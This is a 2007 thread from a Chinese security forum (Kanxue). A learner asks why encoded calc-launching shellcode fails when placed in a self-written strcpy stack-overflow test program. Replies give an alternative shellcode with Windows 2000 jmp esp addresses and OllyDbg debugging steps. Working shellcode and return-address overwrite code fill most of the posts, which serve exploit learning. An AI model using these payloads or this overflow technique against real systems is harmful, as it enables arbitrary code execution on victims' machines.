[求助]学习溢出时遇到的问题-软件逆向-看雪-安全社区|安全招聘|kanxue.com

0

[求助]学习溢出时遇到的问题

发表于: 2007-8-19 11:22 4976

[求助]学习溢出时遇到的问题

高亮

活跃值

2007-8-19 11:22

4976

//目的：测试如下shell在win2000下可用
//windows下开计算器的shell
char calc_shell[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a";
int main ()
{
_asm
{
lea eax,calc_shell
jmp eax
}

return 0;
}
编译后
计算器程序可正常运行(说明shell没问题)
但是加在以下溢出测试程序中就不行了
代码如下：

include <stdio.h>
#include <string.h>

char name[] =
"\x41\x41\x41\x41"  //name[0]-name[3]
"\x42\x43\x44\x41"  //name[4]-name[7]
"\x41\x41\x41\x41"  //覆盖ebp
"\x12\x45\xfa\x7f" //!覆盖成jmp esp的地址，lion的通用地址7ffa4512!


"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a";

int main()
{
char output[8];

strcpy(output, name);

for(int i=0;i<8&&output[i];i++)

      printf("\\0x%x",output[i]);

return 0;
}
结果又是看似正常的显示了，没报错，没弹筐。
和书上教的那个溢出现象有出入，
这个是怎么回事呢？

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・0

免费

支持

分享

最新回复 (4)
ClyDenker 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 60 粉丝 0 关注私信	ClyDenker 2 楼有可能是没有引用user32.dll 另外就是shellcode太长了，堆栈不够。到第七行中间就断了。下面的shellcode可以在win2k Sp2英文版上开计算器。 #include <stdio.h> #include <string.h> #include <windows.h> char shellcode[]= "\x41\x41\x41\x41" //name[0]-name[3] "\x41\x41\x41\x41" //name[4]-name[7] "\x41\x41\x41\x41" //ebp "\x2b\x49\xe2\x77" //in win2k sp2 English version,the address of jmp esp are 77e2492b, 77e3af64, "\xEB" "\x0F\x58\x80\x30\x95\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF" "\xFF\xC0\x1C\x70\xA4\x55\xC5\xC5\xC5\x53\xD0\x61\xD8\x53\xD0\x60\xC6\x53\xD0\x63" "\xC3\x53\xD0\x62\xD6\x53\xD0\x6D\xC7\x53\xD0\x6C\xC1\x53\xD0\x6F\xBB\x53\xD0\x6E" "\xD1\x53\xD0\x69\xD9\x53\xD0\x68\xD9\x2F\xC1\x37\x7D\xE2\xC7\x18\xD0\x61\xC5\x6A" "\xC0\x65\xC0\x1C\x70\x14\x79\xB9\x95\x95\x95\x2D\xF6\xF4\xF9\xF6\x1C\xD0\x61\x2D" "\xBB\xF0\xED\xF0\x1C\xD0\x6D\xA4\x47\x1C\xC0\x69\x18\xD0\x61\xC5\x2D\xDF\x0E\x94" "\xED\x6A\x45\x95\x95\x68\x61\x63\x6B\xCD"; int main() { MessageBox(NULL,TEXT("Use user32.dll"),TEXT("Caution"),MB_OK); char output[8]; strcpy(output, shellcode); for(int i=0;i<8&&output[i];i++) printf("\\0x%x",output[i]); return 0; } 2007-8-19 14:58 0
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 86 粉丝 1 关注私信	高亮 3 楼首先谢谢ClyDenker的解答您说的shellcode到第七行中间就断了我想知道您调试的时候是根据什么看出来的？小弟刚开始学还不会调试这东东 2007-8-20 06:40 0
ClyDenker 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 60 粉丝 0 关注私信	ClyDenker 4 楼我用Olly看的。先在VC里找到入口(1)。然后在Olly里看shellcode(2)。 1.自己的程序，当然知道入口点 1.1 (VC6)在main的起始位置设置断点--在main的起始位置点右键 \| Insert/Remove BreakPoint (F9) 1.2 Build\| Start Debug\| Go(F5) 1.3 在main的起始位置点右键\| Go To Disassembly 。或者:View\| Debug Windows\| Disassembly(Alt+8) 然后看到main的入口，记下地址。 2.在Olly中调试 2.1 用Olly打开程序然后在CmdBar或者CmdLine里设置一个断点bp ×××（就是刚才记下的main的入口地址） 2.2 Debug\| Run (F9) 2.3 Debug\| Execute till return (Ctrl+F9)--程序溢出的是main的返回点 2.4 按两次F8，就来到Shellcode了。拖到最下面，把最后的几个字节拿到shellcode里查找，就知道了。 2007-8-20 09:30 0
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 86 粉丝 1 关注私信	高亮 5 楼哦学习中呵呵谢谢啊 2007-8-20 17:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

返回

高亮

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区